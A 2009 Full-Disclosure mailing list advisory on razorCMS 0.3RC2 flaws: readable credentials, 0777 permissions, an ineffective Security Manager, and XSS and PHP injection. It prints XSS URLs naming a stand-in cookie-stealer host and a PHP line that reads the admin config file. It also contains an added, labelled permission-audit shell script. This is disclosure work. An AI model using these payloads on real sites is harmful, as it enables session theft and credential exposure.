-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

The following was received this morning from the author of razorCMS. It seems the threat of full disclosure really expedites vulnerability remediation ;)
"All XSS attacks are now plugged, this has been solved. The admin password now uses my own password hashing method that introduces salt in at a position that is relative to the input password length, the salt is then appended to the front of the password. FTP password is now encrypted again using my own algorithm and is only decrypted using a key stored in session. This way, to get the FTP password they have to look at the file to get the FTP password, then hijack the session that is randomly changing its session number every refresh to get the key to unlock it. The whole system now gets owned by Apache, and the security manager has now gone, and been replaced with a security check on the main page when logging in; this checks ALL files and lets you secure ALL files. If any files are open the big box goes red, so you would have to be blind to miss it. This will also work for FTP mode too and just checking how much functionality I can get out of it for Windows permissions too. There is still the option to make all files unsafe, as this can be invaluable when uninstalling razorCMS, but it is riddled with error messages and turns the box red, plus it's on the home page so you will see it every time you login. Login now bans you after X amount of tries, for up to 60 mins; you can have no more than 8 failed logins in 60 mins, and if you conceal your IP it will ban you from logging in. All up to 300 records are stored in a log which prunes itself to 300 records (all configurable). I have a file manager to add in the mix too, so there's been a lot of effort here to tighten things up a hell of a lot. Should be about a week or two then I'll release for testing. It's still got some rough edges."

All razorCMS users are encouraged to upgrade to the latest stable version (0.4) once it's released in "about a week or two."
One thing I accidentally left out of the disclosure below:

* A permanent XSS vulnerability has been discovered in the "Page Title" field of the "Create New Page" form, making it vulnerable to permanent XSS viruses. Any script tags appended to the page title will be executed on every page view and executed three times every time the Content Manager is accessed in the admin section. This presumably has been fixed for the new release per the author's statement above.

On Thu, 16 Apr 2009 02:13:23 -0700 Jeremi Gosney <[email protected]> wrote:

>Multiple Vulnerability Disclosure for razorCMS
>----------------------------------------------
>
>A recent security audit has uncovered multiple security vulnerabilities in the latest version (0.3RC2) and all previous versions of razorCMS CORE by Morgan Integrated Systems. From the vendor site: "razorCMS is an open source content management system written in PHP, using a flat file database structure instead of having a separate database. It has been released under the GNU General Public License." http://razorcms.co.uk, http://en.wikipedia.org/wiki/RazorCMS
>
>* The razorCMS install script sets mode 0644 on admin/core/admin_config.php, which contains the site owner's cleartext FTP credentials and a sha1sum hash of the site admin password. Any local user has access to these credentials, and the admin password can easily be cracked offline (rainbow tables, brute force, etc). The vendor is planning for the use of stronger file permissions, two-way encryption for FTP credentials, and stronger salted hashes for admin passwords in the next release (version 0.4).
>
>* razorCMS requires a laundry list of files to be mode 0777 for installation, and promises to correct these permissions after installation. The razorCMS install script leaves the following directories in mode 0777 after installation: the razorCMS root directory, the datastore/ directory, and the admin/core/ directory. The issue with this should be readily apparent to you. The vendor is considering fixing the installer in the next release.
>
>* The razorCMS Security Manager is "used to ensure apache owned files have safe permissions set." In theory, if the Security Manager detects any insecure files, it will display a warning message and instruct the user to click a button to "secure" the site. By the same token, if all files are found to be secure, the Security Manager will display "All files are currently safe." The problem is the Security Manager doesn't actually *do* anything -- it only checks the file permissions of a handful of files, and not even all of the Apache-owned files like it states. If a user were to recursively chmod the razorCMS installation to 0777 (which may be tempting for a novice user to do due to the large number of files the installer requires to be mode 0777) and then rely on the Security Manager to secure the site, nearly all files and directories would be left in mode 0777 and the Security Manager would report "All files are currently safe." The vendor does not feel that this tool is broken, just that the phrase "All files" is misleading and the wording should be changed. I have been unsuccessful in convincing the vendor that the Security Manager should *actually* secure the site, so don't expect this to be fixed. Ever.
>
>* Several cross-site scripting vulnerabilities have been discovered in the razorCMS admin section, and will be fixed for the next release:
>
>http://yoursite.com/cms/admin/?action=edit&slab=home'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form
>
>http://yoursite.com/cms/admin/?action=showcats&unpub=true&slabID=1&catname=sidebar'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form
>
>http://yoursite.com/cms/admin/?action=reordercat&cat=sidebar'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form&param=0,1
>
>* razorCMS has the ability to save content as .php files (behaviour enabled by default, may be changed in the 'Settings' area to html). This allows arbitrary PHP code to be injected into any page, enabling the owner to run commands on the server with the privileges of the web server. This may also be exploited remotely through a cross-site request forgery attack: for example, in an effort to steal user credentials, an authenticated admin may be tricked into submitting a malicious form that creates a page on their site containing something like <?php system("cat ../../admin/core/admin_config.php"); ?>. The vendor has no plans to change this behaviour.
>
>
>Timeline:
>04.06.2009 - Initial vendor notification.
>04.07.2009 - Vendor disputes vulnerabilities.
>04.07.2009 - Vulnerabilities explained.
>04.07.2009 - Vendor begins to implement certain fixes, refuses to fix others.
>04.07.2009 - Vulnerabilities explained again.
>04.07.2009 - Vendor continues to dispute some vulnerabilities.
>04.15.2009 - Vendor notified for last time.
>04.16.2009 - Public Disclosure.
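The recursive permission check that the disclosure says the Security Manager should have performed, as an added example that is not part of the original post and not razorCMS code: a POSIX shell script that lists every world-writable entry under an install root and, when told to fix, resets directories to 0755 and regular files to 0644. The sample tree it builds is constructed here and only mirrors the directory names the disclosure mentions (root, datastore/, admin/core/); the script name audit.sh is assumed.

```shell
#!/bin/sh
# Added example, not razorCMS code: the recursive check the Security
# Manager should have done.  Every file or directory under the install
# root that is writable by "other" is reported, and "fix" resets
# directories to 0755 and regular files to 0644.

# Print every world-writable path under $1, one per line.
list_world_writable() {
    find "$1" -perm -002 -print | sort
}

# Count world-writable entries under $1: the only honest basis for an
# "All files are currently safe" banner.
count_world_writable() {
    list_world_writable "$1" | wc -l | tr -d ' '
}

# Reset permissions: directories 0755, regular files 0644.
secure_tree() {
    find "$1" -type d -perm -002 -exec chmod 0755 {} +
    find "$1" -type f -perm -002 -exec chmod 0644 {} +
}

# Constructed sample install (not a real razorCMS tree) mirroring the
# layout the disclosure names: root, datastore/ and admin/core/ left
# 0777, plus one 0666 content file; admin_config.php itself is 0644.
make_sample_install() {
    dir=$(mktemp -d)
    mkdir -p "$dir/datastore" "$dir/admin/core"
    : > "$dir/index.php"
    : > "$dir/datastore/home.php"
    : > "$dir/admin/core/admin_config.php"
    chmod 0755 "$dir/admin"
    chmod 0644 "$dir/index.php" "$dir/admin/core/admin_config.php"
    chmod 0666 "$dir/datastore/home.php"
    chmod 0777 "$dir" "$dir/datastore" "$dir/admin/core"
    echo "$dir"
}

# Usage: sh audit.sh <razorcms-root> [fix]
if [ $# -gt 0 ]; then
    [ "$2" = "fix" ] && secure_tree "$1"
    list_world_writable "$1"
    echo "world-writable entries: $(count_world_writable "$1")"
fi
```

On the constructed tree the audit reports four world-writable entries (the root, datastore/, admin/core/ and datastore/home.php) and zero after the fix; a handful of hard-coded paths, as the original Security Manager used, would miss all but the ones it happened to list.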
-----BEGIN PGP SIGNATURE-----
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
